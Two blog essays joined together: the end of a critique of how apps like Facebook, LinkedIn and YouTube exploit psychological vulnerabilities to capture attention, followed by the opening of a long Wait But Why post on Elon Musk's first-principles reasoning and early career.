But if we zoom into that fear, we’ll discover that it’s unbounded: we’ll always miss something important at any point when we stop using something.
There are magic moments on Facebook we’ll miss by not using it for the 6th hour (e.g. an old friend who’s visiting town right now).
There are magic moments we’ll miss on Tinder (e.g. our dream romantic partner) by not swiping our 700th match.
There are emergency phone calls we’ll miss if we’re not connected 24/7.
But living moment to moment with the fear of missing something isn’t how we’re built to live.
And it’s amazing how quickly, once we let go of that fear, we wake up from the illusion. When we unplug for more than a day, unsubscribe from those notifications, or go to Camp Grounded — the concerns we thought we’d have don’t actually happen.
We don’t miss what we don’t see.
The thought, “what if I miss something important?” is generated in advance of unplugging, unsubscribing, or turning off — not after. Imagine if tech companies recognized that, and helped us proactively tune our relationships with friends and businesses in terms of what we define as “time well spent” for our lives, instead of in terms of what we might miss.
Hijack #4: Social Approval
Easily one of the most persuasive things a human being can receive.
We’re all vulnerable to social approval. The need to belong, to be approved or appreciated by our peers is among the highest human motivations. But now our social approval is in the hands of tech companies.
When I get tagged by my friend Marc, I imagine him making a conscious choice to tag me. But I don’t see how a company like Facebook orchestrated his doing that in the first place.
Facebook, Instagram or SnapChat can manipulate how often people get tagged in photos by automatically suggesting all the faces people should tag (e.g. by showing a box with a 1-click confirmation, “Tag Tristan in this photo?”).
So when Marc tags me, he’s actually responding to Facebook’s suggestion, not making an independent choice. But through design choices like this, Facebook controls the multiplier for how often millions of people experience their social approval on the line.
Facebook uses automatic suggestions like this to get people to tag more people, creating more social externalities and interruptions.
The same happens when we change our main profile photo — Facebook knows that’s a moment when we’re vulnerable to social approval: “what do my friends think of my new pic?” Facebook can rank this higher in the news feed, so it sticks around for longer and more friends will like or comment on it. Each time they like or comment on it, we’ll get pulled right back.
Everyone innately responds to social approval, but some demographics (teenagers) are more vulnerable to it than others. That’s why it’s so important to recognize how powerful designers are when they exploit this vulnerability.
Hijack #5: Social Reciprocity (Tit-for-tat)
You do me a favor — I owe you one next time.
You say, “thank you”— I have to say “you’re welcome.”
You send me an email— it’s rude not to get back to you.
You follow me — it’s rude not to follow you back. (especially for teenagers)
We are vulnerable to needing to reciprocate others’ gestures. But as with Social Approval, tech companies now manipulate how often we experience it.
In some cases, it’s by accident. Email, texting and messaging apps are social reciprocity factories. But in other cases, companies exploit this vulnerability on purpose.
LinkedIn is the most obvious offender. LinkedIn wants as many people creating social obligations for each other as possible, because each time they reciprocate (by accepting a connection, responding to a message, or endorsing someone back for a skill) they have to come back to linkedin.com where they can get people to spend more time.
Like Facebook, LinkedIn exploits an asymmetry in perception. When you receive an invitation from someone to connect, you imagine that person making a conscious choice to invite you, when in reality, they likely unconsciously responded to LinkedIn’s list of suggested contacts. In other words, LinkedIn turns your unconscious impulses (to “add” a person) into new social obligations that millions of people feel obligated to repay. All while they profit from the time people spend doing it.
Imagine millions of people getting interrupted like this throughout their day, running around like chickens with their heads cut off, reciprocating each other — all designed by companies who profit from it.
Welcome to social media.
After accepting an endorsement, LinkedIn takes advantage of your bias to reciprocate by offering four additional people for you to endorse in return.
Imagine if technology companies had a responsibility to minimize social reciprocity. Or if there was an independent organization that represented the public’s interests — an industry consortium or an FDA for tech — that monitored when technology companies abused these biases?
Hijack #6: Bottomless bowls, Infinite Feeds, and Autoplay
YouTube autoplays the next video after a countdown
Another way to hijack people is to keep them consuming things, even when they aren’t hungry anymore.
How? Easy. Take an experience that was bounded and finite, and turn it into a bottomless flow that keeps going.
Cornell professor Brian Wansink demonstrated this in his study showing you can trick people into keep eating soup by giving them a bottomless bowl that automatically refills as they eat. With bottomless bowls, people eat 73% more calories than those with normal bowls and underestimate how many calories they ate by 140 calories.
Tech companies exploit the same principle. News feeds are purposely designed to auto-refill with reasons to keep you scrolling, and purposely eliminate any reason for you to pause, reconsider or leave.
It’s also why video and social media sites like Netflix, YouTube or Facebook autoplay the next video after a countdown instead of waiting for you to make a conscious choice (in case you won’t). A huge portion of traffic on these websites is driven by autoplaying the next thing.
Facebook autoplays the next video after a countdown
Tech companies often claim that “we’re just making it easier for users to see the video they want to watch” when they are actually serving their business interests. And you can’t blame them, because increasing “time spent” is the currency they compete for.
Instead, imagine if technology companies empowered you to consciously bound your experience to align with what would be “time well spent” for you. Not just bounding the quantity of time you spend, but the qualities of what would be “time well spent.”
Hijack #7: Instant Interruption vs. “Respectful” Delivery
Companies know that messages that interrupt people immediately are more persuasive at getting people to respond than messages delivered asynchronously (like email or any deferred inbox).
Given the choice, Facebook Messenger (or WhatsApp, WeChat or SnapChat for that matter) would prefer to design their messaging system to interrupt recipients immediately (and show a chat box) instead of helping users respect each other’s attention.
In other words, interruption is good for business.
It’s also in their interest to heighten the feeling of urgency and social reciprocity. For example, Facebook automatically tells the sender when you “saw” their message, instead of letting you avoid disclosing whether you read it (“now that you know I’ve seen the message, I feel even more obligated to respond.”)
By contrast, Apple more respectfully lets users toggle “Read Receipts” on or off.
The problem is, maximizing interruptions in the name of business creates a tragedy of the commons, ruining global attention spans and causing billions of unnecessary interruptions each day. This is a huge problem we need to fix with shared design standards (potentially, as part of Time Well Spent).
Hijack #8: Bundling Your Reasons with Their Reasons
Another way apps hijack you is by taking your reasons for visiting the app (to perform a task) and make them inseparable from the app’s business reasons (maximizing how much we consume once we’re there).
For example, in the physical world of grocery stores, the #1 and #2 most popular reasons to visit are pharmacy refills and buying milk. But grocery stores want to maximize how much people buy, so they put the pharmacy and the milk at the back of the store.
In other words, they make the thing customers want (milk, pharmacy) inseparable from what the business wants. If stores were truly organized to support people, they would put the most popular items in the front.
Tech companies design their websites the same way. For example, when you you want to look up a Facebook event happening tonight (your reason) the Facebook app doesn’t allow you to access it without first landing on the news feed (their reasons), and that’s on purpose. Facebook wants to convert every reason you have for using Facebook, into their reason which is to maximize the time you spend consuming things.
Instead, imagine if …
Twitter gave you a separate way to post an Tweet than having to see their news feed.
Facebook gave a separate way to look up Facebook Events going on tonight, without being forced to use their news feed.
Facebook gave you a separate way to use Facebook Connect as a passport for creating new accounts on 3rd party apps and websites, without being forced to install Facebook’s entire app, news feed and notifications.
In a Time Well Spent world, there is always a direct way to get what you want separately from what businesses want. Imagine a digital “bill of rights” outlining design standards that forced the products used by billions of people to let them navigate directly to what they want without needing to go through intentionally placed distractions.
Imagine if web browsers empowered you to navigate directly to what you want — especially for sites that intentionally detour you toward their reasons.
Hijack #9: Inconvenient Choices
We’re told that it’s enough for businesses to “make choices available.”
“If you don’t like it you can always use a different product.”
“If you don’t like it, you can always unsubscribe.”
“If you’re addicted to our app, you can always uninstall it from your phone.”
Businesses naturally want to make the choices they want you to make easier, and the choices they don’t want you to make harder. Magicians do the same thing. You make it easier for a spectator to pick the thing you want them to pick, and harder to pick the thing you don’t.
For example, NYTimes.com lets you “make a free choice” to cancel your digital subscription. But instead of just doing it when you hit “Cancel Subscription,” they send you an email with information on how to cancel your account by calling a phone number that’s only open at certain times.
NYTimes claims it’s giving a free choice to cancel your account
Instead of viewing the world in terms of availability of choices, we should view the world in terms of friction required to enact choices. Imagine a world where choices were labeled with how difficult they were to fulfill (like coefficients of friction) and there was an independent entity — an industry consortium or non-profit — that labeled these difficulties and set standards for how easy navigation should be.
Hijack #10: Forecasting Errors, “Foot in the Door” strategies
Facebook promises an easy choice to “See Photo.” Would we still click if it gave the true price tag?
Lastly, apps can exploit people’s inability to forecast the consequences of a click.
People don’t intuitively forecast the true cost of a click when it’s presented to them. Sales people use “foot in the door” techniques by asking for a small innocuous request to begin with (“just one click to see which tweet got retweeted”) and escalate from there (“why don’t you stay awhile?”). Virtually all engagement websites use this trick.
Imagine if web browsers and smartphones, the gateways through which people make these choices, were truly watching out for people and helped them forecast the consequences of clicks (based on real data about what benefits and costs it actually had?).
That’s why I add “Estimated reading time” to the top of my posts. When you put the “true cost” of a choice in front of people, you’re treating your users or audience with dignity and respect. In a Time Well Spent internet, choices could be framed in terms of projected cost and benefit, so people were empowered to make informed choices by default, not by doing extra work.
TripAdvisor uses a “foot in the door” technique by asking for a single click review (“How many stars?”) while hiding the three page survey of questions behind the click.
Summary And How We Can Fix This
Are you upset that technology hijacks your agency? I am too. I’ve listed a few techniques but there are literally thousands. Imagine whole bookshelves, seminars, workshops and trainings that teach aspiring tech entrepreneurs techniques like these. Imagine hundreds of engineers whose job every day is to invent new ways to keep you hooked.
The ultimate freedom is a free mind, and we need technology that’s on our team to help us live, feel, think and act freely.
We need our smartphones, notifications screens and web browsers to be exoskeletons for our minds and interpersonal relationships that put our values, not our impulses, first. People’s time is valuable. And we should protect it with the same rigor as privacy and other digital rights.
Welcome to the last post in the series on the world of Elon Musk.
It’s been a long one, I know. A long series with long posts and a long time between posts. It turns out that when it comes to Musk and his shit, there was a lot to say.
Anyone who’s read the first three posts in this series is aware that I’ve not only been buried in the things Musk is doing, I’ve been drinking a tall glass of the Elon Musk Kool-Aid throughout. I’m very, very into it.
I kind of feel like that’s fine, right? The dude is a steel-bending industrial giant in America in a time when there aren’t supposed to be steel-bending industrial giants in America, igniting revolutions in huge, old industries that aren’t supposed to be revolutionable. After emerging from the 1990s dotcom party with $180 million, instead of sitting back in his investor chair listening to pitches from groveling young entrepreneurs, he decided to start a brawl with a group of 900-pound sumo wrestlers—the auto industry, the oil industry, the aerospace industry, the military-industrial complex, the energy utilities—and he might actually be winning. And all of this, it really seems, for the purpose of giving our species a better future.
Pretty Kool-Aid worthy. But someone being exceptionally rad isn’t Kool-Aid worthy enough to warrant 90,000 words over a string of months on a blog that’s supposed to be about a wide range of topics.
During the first post, I laid out the two objectives for the series:
1) To understand why Musk is doing what he’s doing.
2) To understand why Musk is able to do what he’s doing.
So far, we’ve spent most of the time exploring objective #1. But what really intrigued me as I began thinking about this was objective #2. I’m fascinated by those rare people in history who manage to dramatically change the world during their short time here, and I’ve always liked to study those people and read their biographies. Those people know something the rest of us don’t, and we can learn something valuable from them. Getting access to Elon Musk gave me what I decided was an unusual chance to get my hands on one of those people and examine them up close. If it were just Musk’s money or intelligence or ambition or good intentions that made him so capable, there would be more Elon Musks out there. No, it’s something else—what TED curator Chris Anderson called Musk’s “secret sauce”—and for me, this series became a mission to figure it out.
The good news is, after a lot of time thinking about this, reading about this, and talking to him and his staff, I think I’ve got it. What for a while was a large pile of facts, observations, and sound bites eventually began to congeal into a common theme—a trait in Musk that I believe he shares with many of the most dynamic icons in history and that separates him from almost everybody else.
As I worked through the Tesla and SpaceX posts, this concept kept surfacing, and it became clear to me that this series couldn’t end without a deep dive into exactly what it is that Musk and a few others do so unusually well. The thing that tantalized me is that this secret sauce is actually accessible to everyone and right there in front of us—if we can just wrap our heads around it. Mulling this all over has legitimately affected the way I think my life, my future, and the choices I make—and I’m going to try my best in this post to explain why.
Two Kinds of Geology
In 1681, English theologian Thomas Burnet published Sacred Theory of the Earth, in which he explained how geology worked. What happened was, around 6,000 years ago, the Earth was formed as a perfect sphere with a surface of idyllic land and a watery interior. But then, when the surface dried up a little later, cracks formed in its surface, releasing much of the water from within. The result was the Biblical Deluge and Noah having to deal with a ton of shit all week. Once things settled down, the Earth was no longer a perfect sphere—all the commotion had distorted the surface, bringing about mountains and valleys and caves down below, and the whole thing was littered with the fossils of the flood’s victims.
And bingo. Burnet had figured it out. The great puzzle of fundamental theology had been to reconcile the large number of seemingly-very-old Earth features with the much shorter timeline of the Earth detailed in the Bible. For theologians of the time, it was their version of the general relativity vs. quantum mechanics quandary, and Burnet had come up with a viable string theory to unify it all under one roof.
It wasn’t just Burnet. There were enough theories kicking around reconciling geology with the verses of the Bible to today warrant a 15,000-word “Flood Geology” Wikipedia page.
Around the same time, another group of thinkers started working on the geology puzzle: scientists.
For the theologian puzzlers, the starting rules of the game were, “Fact: the Earth began 6,000 years ago and there was at one point an Earth-sweeping flood,” and their puzzling took place strictly within that context. But the scientists started the game with no rules at all. The puzzle was a blank slate where any observations and measurements they found were welcome.
Over the next 300 years, the scientists built theory upon theory, and as new technologies brought in new types of measurements, old theories were debunked and replaced with new updated versions. The science community kept surprising themselves as the apparent age of the Earth grew longer and longer. In 1907, there was a huge breakthrough when American scientist Bertram Boltwood pioneered the technique of deciphering the age of rocks through radiometric dating, which found elements in a rock with a known rate of radioactive decay and measured what portion of those elements remained intact and what portion had already converted to decay substance.
Radiometric dating blew Earth’s history backwards into the billions of years, which burst open new breakthroughs in science like the theory of Continental Drift, which in turn led to the theory of Plate Tectonics. The scientists were on a roll.
Meanwhile, the flood geologists would have none of it. To them, any conclusions from the science community were moot because they were breaking the rules of the game to begin with. The Earth was officially less than 6,000 years old, so if radiometric dating showed otherwise, it was a flawed technique, period.
But the scientific evidence grew increasingly compelling, and as time wore on, more and more flood geologists threw in the towel and accepted the scientist’s viewpoint—maybe they had had the rules of the game wrong.
Some, though, held strong. The rules were the rules, and it didn’t matter how many people agreed that the Earth was billions of years old—it was a grand conspiracy.
Today, there are still many flood geologists making their case. Just recently, an author named Tom Vail wrote a book called Grand Canyon: A Different View, in which he explains:
Contrary to what is widely believed, radioactive dating has not proven the rocks of the Grand Canyon to be millions of years old. The vast majority of the sedimentary layers in the Grand Canyon were deposited as the result of a global flood that occurred after and as a result of the initial sin that took place in the Garden of Eden.
If the website analytics stats on Chartbeat included a “Type of Geologist” demographic metric, I imagine that for Wait But Why readers, the breakdown would look something like this:
Geology Breakdown
It makes sense. Whether religious or not, most people who read this site are big on data, evidence, and accuracy. I’m reminded of this every time I make an error in a post.
Whatever role faith plays in the spiritual realm, what most of us agree on is that when seeking answers to our questions about the age of the Earth, the history of our species, the causes of lightning, or any other physical phenomenon in the universe, data and logic are far more effective tools than faith and scripture.
And yet—after thinking about this for a while, I’ve come to an unpleasant conclusion:
When it comes to most of the way we think, the way we make decisions, and the way we live our lives, we’re much more like the flood geologists than the science geologists.
And Elon’s secret? He’s a scientist through and through.
Hardware and Software
The first clue to the way Musk thinks is in the super odd way that he talks. For example:
Human child: “I’m scared of the dark, because that’s when all the scary shit is gonna get me and I won’t be able to see it coming.”
Elon: “When I was a little kid, I was really scared of the dark. But then I came to understand, dark just means the absence of photons in the visible wavelength—400 to 700 nanometers. Then I thought, well it’s really silly to be afraid of a lack of photons. Then I wasn’t afraid of the dark anymore after that.”2
Or:
Human father: “I’d like to start working less because my kids are starting to grow up.”
Elon: “I’m trying to throttle back, because particularly the triplets are starting to gain consciousness. They’re almost two.”3
Or:
Human single man: “I’d like to find a girlfriend. I don’t want to be so busy with work that I have no time for dating.”
Elon: “I would like to allocate more time to dating, though. I need to find a girlfriend. That’s why I need to carve out just a little more time. I think maybe even another five to 10 — how much time does a woman want a week? Maybe 10 hours? That’s kind of the minimum? I don’t know.”4
I call this MuskSpeak. MuskSpeak is a language that describes everyday parts of life as exactly what they actually, literally are.
There are plenty of instances of technical situations when we all agree that MuskSpeak makes much more sense than normal human parlance—
Heart Surgery
—but what makes Musk odd is that he thinks about most things in MuskSpeak, including many areas where you don’t usually find it. Like when I asked him if he was afraid of death, and he said having kids made him more comfortable with dying, because “kids sort of are a bit you. At least they’re half you. They’re half you at the hardware level, and depending on how much time you have with them, they’re that percentage of you at the software level.”
When you or I look at kids, we see small, dumb, cute people. When Musk looks at his five kids, he sees five of his favorite computers. When he looks at you, he sees a computer. And when he looks in the mirror, he sees a computer—his computer. It’s not that Musk suggests that people are just computers—it’s that he sees people as computers on top of whatever else they are.
And at the most literal level, Elon’s right about people being computers. At its simplest definition, a computer is an object that can store and process data—which the brain certainly is.
And while this isn’t the most poetic way to think about our minds, I’m starting to believe that it’s one of those areas of life where MuskSpeak can serve us well—because thinking of a brain as a computer forces us to consider the distinction between our hardware and our software, a distinction we often fail to recognize.
For a computer, hardware is defined as “the machines, wiring, and other physical components of a computer.” So for a human, that’s the physical brain they were born with and all of its capabilities, which determines their raw intelligence, their innate talents, and other natural strengths and shortcomings.
A computer’s software is defined as “the programs and other operating information used by a computer.” For a human, that’s what they know and how they think—their belief systems, thought patterns, and reasoning methods. Life is a flood of incoming data of all kinds that enter the brain through our senses, and it’s the software that assesses and filters all that input, processes and organizes it, and ultimately uses it to generate the key output—a decision.
The hardware is a ball of clay that’s handed to us when we’re born. And of course, not all clay is equal—each brain begins as a unique combination of strengths and weaknesses across a wide range of processes and capabilities.
But it’s the software that determines what kind of tool the clay gets shaped into.
When people think about what makes someone like Elon Musk so effective, they often focus on the hardware—and Musk’s hardware has some pretty impressive specs. But the more I learn about Musk and other people who seem to have superhuman powers—whether it be Steve Jobs, Albert Einstein, Henry Ford, Genghis Khan, Marie Curie, John Lennon, Ayn Rand, or Louis C.K.—the more I’m convinced that it’s their software, not their natural-born intelligence or talents, that makes them so rare and so effective.
So let’s talk about software—starting with Musk’s. As I wrote the other three posts in this series, I looked at everything I was learning about Musk—the things he says, the decisions he makes, the missions he takes on and how he approaches them—as clues to how his underlying software works.
Eventually, the clues piled up and the shape of the software began to reveal itself. Here’s what I think it looks like:
Elon’s Software
The structure of Musk’s software starts like many of ours, with what we’ll call the Want box:
Software - Want Box
This box contains anything in life where you want Situation A to turn into Situation B. Situation A is currently what’s happening and you want something to change so that Situation B is what’s happening instead. Some examples:
Wants
Next, the Want box has a partner in crime—what we’ll call the Reality box. It contains all things that are possible:
Software - Reality Box
Pretty straightforward.
The overlap of the Want and Reality boxes is the Goal Pool, where your goal options live:2
Software - Goal Pool
So you pick a goal from the pool—the thing you’re going to try to move from Point A to Point B.
And how do you cause something to change? You direct your power towards it. A person’s power can come in various forms: your time, your energy (mental and physical), your resources, your persuasive ability, your connection to others, etc.
The concept of employment is just Person A using their resources power (a paycheck) to direct Person B’s time and/or energy power toward Person A’s goal. When Oprah publicly recommends a book, that’s combining her abundant power of connection (she has a huge reach) and her abundant power of persuasion (people trust her) and directing them towards the goal of getting the book into the hands of thousands of people who would have otherwise never known about it.
Once a goal has been selected, you know the direction in which to point your power. Now it’s time to figure out the most effective way to use that power to generate the outcome you want—that’s your strategy:
Software - Strategy Box
Simple right? And probably not that different from how you think.
But what makes Musk’s software so effective isn’t its structure, it’s that he uses it like a scientist. Carl Sagan said, “Science is a way of thinking much more than it is a body of knowledge,” and you can see Musk apply that way of thinking in two key ways:
1) He builds each software component himself, from the ground up.
Musk calls this “reasoning from first principles.” I’ll let him explain:
I think generally people’s thinking process is too bound by convention or analogy to prior experiences. It’s rare that people try to think of something on a first principles basis. They’ll say, “We’ll do that because it’s always been done that way.” Or they’ll not do it because “Well, nobody’s ever done that, so it must not be good.” But that’s just a ridiculous way to think. You have to build up the reasoning from the ground up—“from the first principles” is the phrase that’s used in physics. You look at the fundamentals and construct your reasoning from that, and then you see if you have a conclusion that works or doesn’t work, and it may or may not be different from what people have done in the past.
In science, this means starting with what evidence shows us to be true. A scientist doesn’t say, “Well we know the Earth is flat because that’s the way it looks, that’s what’s intuitive, and that’s what everyone agrees is true,” a scientist says, “The part of the Earth that I can see at any given time appears to be flat, which would be the case when looking at a small piece of many differently shaped objects up close, so I don’t have enough information to know what the shape of the Earth is. One reasonable hypothesis is that the Earth is flat, but until we have tools and techniques that can be used to prove or disprove that hypothesis, it is an open question.”
A scientist gathers together only what he or she knows to be true—the first principles—and uses those as the puzzle pieces with which to construct a conclusion.
Reasoning from first principles is a hard thing to do in life, and Musk is a master at it. Brain software has four major decision-making centers:
1) Filling in the Want box
2) Filling in the Reality box
3) Goal selection from the Goal Pool
4) Strategy formation
Musk works through each of these boxes by reasoning from first principles. Filling in the Want box from first principles requires a deep, honest, and independent understanding of yourself. Filling in the Reality box requires the clearest possible picture of the actual facts of both the world and your own abilities. The Goal Pool should double as a Goal Selection Laboratory that contains tools for intelligently measuring and weighing options. And strategies should be formed based on what you know, not on what is typically done.
2) He continually adjusts each component’s conclusions as new information comes in.
You might remember doing proofs in geometry class, one of the most mundane parts of everyone’s childhood. These ones:
Given: A = B
Given: B = C + D
Therefore: A = C + D
Math is satisfyingly exact. Its givens are exact and its conclusions are airtight.
In math, we call givens “axioms,” and axioms are 100% true. So when we build conclusions out of axioms, we call them “proofs,” which are also 100% true.
Science doesn’t have axioms or proofs, for good reason.
We could have called Newton’s law of universal gravitation a proof—and for a long time, it certainly seemed like one—but then what happens when Einstein comes around and shows that Newton was actually “zoomed in,” like someone calling the Earth flat, and when you zoom way out, you discover that the real law is general relativity and Newton’s law actually stops working under extreme conditions, while general relativity works no matter what. So then, you’d call general relativity a proof instead. Except then what happens when quantum mechanics comes around and shows that general relativity fails to apply on a tiny scale and that a new set of laws is needed to account for those cases.
There are no axioms or proofs in science because nothing is for sure and everything we feel sure about might be disproven. Richard Feynman has said, “Scientific knowledge is a body of statements of varying degrees of certainty—some most unsure, some nearly sure, none absolutely certain.” Instead of proofs, science has theories. Theories are based on hard evidence and treated as truths, but at all times they’re susceptible to being adjusted or disproven as new data emerges.
So in science, it’s more like:
Given (for now): A = B
Given (for now): B = C + D
Therefore (for now): A = C + D
In our lives, the only true axiom is “I exist.” Beyond that, nothing is for sure. And for most things in life, we can’t even build a real scientific theory because life doesn’t tend to have exact measurements.
Usually, the best we can do is a strong hunch based on what data we have. And in science, a hunch is called a hypothesis. Which works like this:
Given (it seems, based on what I know): A = B
Given (it seems, based on what I know): B = C + D
Therefore (it seems, based on what I know): A = C + D
Hypotheses are built to be tested. Testing a hypothesis can disprove it or strengthen it, and if it passes enough tests, it can be upgraded to a theory.
So after Musk builds his conclusions from first principles, what does he do? He tests the shit out of them, continually, and adjusts them regularly based on what he learns. Let’s go through the whole process to show how:
You begin by reasoning from first principles to A) fill in the Want box, B) fill in the Reality box, C) select a goal from the pool, and D) build a strategy—and then you get to work. You’ve used first principles thinking to decide where to point your power and the most effective way to use it.
But the goal-achievement strategy you came up with was just your first crack. It was a hypothesis, ripe for testing. You test a strategy hypothesis one way: action. You pour your power into the strategy and see what happens. As you do this, data starts flowing in—results, feedback, and new information from the outside world. Certain parts of your strategy hypothesis might be strengthened by this new data, others might be weakened, and new ideas may have sprung to life in your head through the experience—but either way, some adjustment is usually called for:
Software - Strategy Loop
As this strategy loop spins and your power becomes more and more effective at accomplishing your goal, other things are happening down below.
For someone reasoning from first principles, the Want box at any given time is a snapshot of their innermost desires the last time they thought hard about it. But the contents of the Want box are also a hypothesis, and experience can show you that you were wrong about something you thought you wanted or that you want something you didn’t realize you did. At the same time, the inner you isn’t a statue—it’s a shifting, morphing sculpture whose innermost values change as time passes. So even if something in the Want box was correct at one point, as you change, it may lose its place in the box. The Want box should serve the current inner you as best possible, which requires you to update it, something you do through reflection:
Software - Want Loop
A rotating Want loop is called evolution.
On the other side of the aisle, the Reality box is also going through a process. “Things that are possible” is a hypothesis, maybe more so than anything else. It takes into account both the state of the world and your own abilities. And as your own abilities change and grow, the world changes even faster. What was possible in the world in 2005 is very different from what’s possible today, and it’s a huge (and rare) advantage to be working with an up-to-date Reality box.
Filling in your Reality box from first principles is a great challenge, and keeping the box current so that it matches actual reality takes continual work.
Software - Reality Loop
For each of these areas, the box represents the current hypothesis and the circle represents the source of new information that can be used to adjust the hypothesis.
In the science world, the circle is truth, which scientists access by mining for new information in laboratories, studies, and experiments.
Science Loop
New information-mining is happening all the time and hypotheses and theories are in turn being revised regularly.
In life, it’s our duty to remember that the circles are the boss, not the boxes—the boxes are only trying their best to do the circles proud. And if we fall out of touch with what’s happening in the circles, the info in the boxes becomes obsolete and a less effective source for our decision-making.
Thinking about the software as a whole, let’s take a step back. What we see is a goal formation mechanism below and a goal attainment mechanism above. One thing goal attainment often requires is laser focus. To get the results we want, we zoom in on the micro picture, sinking our teeth into our goal and honing in on it with our strategy loop.
But as time passes, the Want box and Reality box adjust contents and morph shape, and eventually, something else can happen—the Goal Pool changes.
The Goal Pool is just the overlap of the Want and Reality boxes, so its own shape and contents are totally dependent on the state of those boxes. And as you live your life inside the goal attainment mechanism above, it’s important to make sure that what you’re working so hard on remains in line with the Goal Pool below—so let’s add in two big red arrows for that:
Software - Full
Checking in with the large circle down below requires us to lift our heads up from the micro mission and do some macro reflection. And when enough changes happen in the Want and Reality boxes that the goal you’re pursuing is no longer in the goal pool, it calls for a macro life change—a breakup, a job switch, a relocation, a priority swap, an attitude shift.
All together, the software I’ve described is a living, breathing system, constructed on a rock solid foundation of first principles, and built to be nimble, to keep itself honest, and to change shape as needed to best serve its owner.
And if you read about Elon Musk’s life, you can watch this software in action.
How Musk’s software wrote his life story
Getting started
Step 1 for Elon was filling in the contents of the Want box. Doing this from first principles is a huge challenge—you have to dig deep into concepts like right and wrong, good and bad, important and valuable, frivolous and trivial. You have to figure out what you respect, what you disdain, what fascinates you, what bores you, and what excites you deep in your inner child. Of course, there’s no way for anyone of any age to have a clear cut answer to these questions, but Elon did the best thing he could by ignoring others and independently pondering.
I talked with him about his early thought process in figuring out what to do with his career. He has said many times that he cares deeply about the future well-being of the human species—something that is clearly in the center of his Want box. I asked how he came to that, and he explained:
The thing that I care about is—when I look into the future, I see the future as a series of branching probability streams. So you have to ask, what are we doing to move down the good stream—the one that’s likely to make for a good future? Because otherwise, you look ahead, and it’s like “Oh it’s dark.” If you’re projecting to the future, and you’re saying “Wow, we’re gonna end up in some terrible situation,” that’s depressing.
Fair. Honing in on his specific path, I brought up the great modern physicists like Einstein and Hawking and Feynman, and I asked him whether he considered going into scientific discovery instead of engineering. His response:
I certainly admire the discoveries of the great scientists. They’re discovering what already exists—it’s a deeper understanding of how the universe already works. That’s cool—but the universe already sort of knows that. What matters is knowledge in a human context. What I’m trying to ensure is that knowledge in a human context is still possible in the future. So it’s sort of like—I’m more like the gardener, and then there are the flowers. If there’s no garden, there’s no flowers. I could try to be a flower in the garden, or I could try to make sure there is a garden. So I’m trying to make sure there is a garden, such that in the future, many Feynmans may bloom.
In other words, both A and B are good, but without A there is no B. So I choose A.
He went on:
I was at one point thinking about doing physics as a career—I did undergrad in physics—but in order to really advance physics these days, you need the data. Physics is fundamentally governed by the progress of engineering. This debate—“Which is better, engineers or scientists? Aren’t scientists better? Wasn’t Einstein the smartest person?”—personally, I think that engineering is better because in the absence of the engineering, you do not have the data. You just hit a limit. And yeah, you can be real smart within the context of the limit of the data you have, but unless you have a way to get more data, you can’t make progress. Like look at Galileo. He engineered the telescope—that’s what allowed him to see that Jupiter had moons. The limiting factor, if you will, is the engineering. And if you want to advance civilization, you must address the limiting factor. Therefore, you must address the engineering.
A and B are both good, but B can only advance if A advances. So I choose A.
In thinking about where exactly to point himself to best help humanity, Musk says that in college, he thought hard about the first principles question, “What will most affect the future of humanity?” and put together a list of five things: “the internet; sustainable energy; space exploration, in particular the permanent extension of life beyond Earth; artificial intelligence; and reprogramming the human genetic code.”5
Hearing him talk about what matters to him, you can see up and down the whole stack of Want box reasoning that led him to his current endeavors.
He has other reasons too. Next to wanting to help humanity in the Want box is this quote:
I’m interested in things that change the world or affect future in wondrous new technology where you see it and you’re like, “How did that even happen? How is that possible?”
This follows a theme of Musk being passionate about super-advanced technology and the excitement it brings to him and other people. So an ideal endeavor for Musk would be something to do with engineering, something in an area that will be important for the future, and something to do with cutting-edge technology. Those broad, basic Want box items alone narrow down the goal pool considerably.
Meanwhile, he was a teenager with no money, reputation, or connections, and limited knowledge and skills. In other words, his Reality box wasn’t that big. So he did what many young people do—he focused his early goals not around achieving his Wants, but expanding the Reality box and its list of “things that are possible.” He wanted to be able to legally stay in the US after college, and he also wanted to gain more knowledge about engineering, so he killed two birds with one stone and applied to a PhD program at Stanford to study high energy density capacitors, a technology aimed at coming up with a more efficient way than traditional batteries to store energy.
U-turn to the internet
Musk had gone into the Goal Pool and picked the Stanford program, and he moved to California to get started. But there was one thing—it was 1995. The internet was in the early stages of taking off and moving much faster than people had anticipated. It was also a world he could dive into without money or a reputation. So Musk added a bunch of internet-related possibilities into his Reality box. The early internet was also more exciting than he had anticipated—so getting involved in it quickly found its way into his Want box.
These rapid adjustments caused big changes in his Goal Pool, to the point where the Stanford PhD was no longer what his software’s goal formation center was outputting.
Most people would have stuck with the Stanford program—because they had already told everyone about it and it would be weird to quit, because it was Stanford, because it was a more normal path, because it was safer, because the internet might be a fad, because what if he were 35 one day and was a failure with no money because he couldn’t get a good job without the right degree.
Musk quit the program after two days. The big macro arrow of his software came down on the right, saw that what he was embarking on wasn’t in the Goal Pool anymore, and he trusted his software—so he made a macro change.
He started Zip2 with his brother, an early cross between the concepts of the Yellow Pages and Google Maps. Four years later, they sold the company and Elon walked away with $22 million.
As a dotcom millionaire, the conventional wisdom was to settle down as a lifelong rich guy and either invest in other companies or start something new with other people’s money.
But Musk’s goal formation center had other ideas. His Want box was bursting with ambitious startup ideas that he thought could have major impact on the world, and his Reality box, which now included $22 million, told him that he had a high chance of succeeding. Being leisurely on the sidelines was nowhere in his Want box and totally unnecessary according to his Reality box.
So he used his newfound wealth to start X.com in 1999, with the vision to build a full-service online financial institution. The internet was still young and the concept of storing your money in an online bank was totally inconceivable to most people, and Musk was advised by many that it was a crazy plan. But again, Musk trusted his software. What he knew about the internet told him that this was inside the Reality box—because his reasoning told him that when it came to the internet, the Reality box had grown much bigger than people realized—and that was all he needed to know to move forward. In the top part of his software, as his strategy-action-results-adjustments loop spun, X.com’s service changed, the team changed, the mission changed, even the name changed. By the time eBay bought it in 2002, the company was called PayPal and it was a money transfer service. Musk made $180 million.
Following his software to space
Now 31 years old and fabulously wealthy, Musk had to figure out what to do next with his life. On top of the “whatever you do, definitely don’t risk losing that money you have” conventional wisdom, there was also the common logic that said, “You’re awesome at building internet companies, but that’s all you know since you’ve never done anything else. You’re in your thirties now and it’s too late to do something big in a whole different field. This is the path you chose—you’re an internet guy.”
But Musk went back to first principles. He looked inwards to his Want box, and having reflected on things, doing another internet thing wasn’t really in the box anymore. What was in there was his still-burning desire to help the future of humanity. In particular, he felt that to have a long future, the species would have to become much better at space travel.
So he started exploring the limits of the Reality box when it came to getting involved in the aerospace industry.
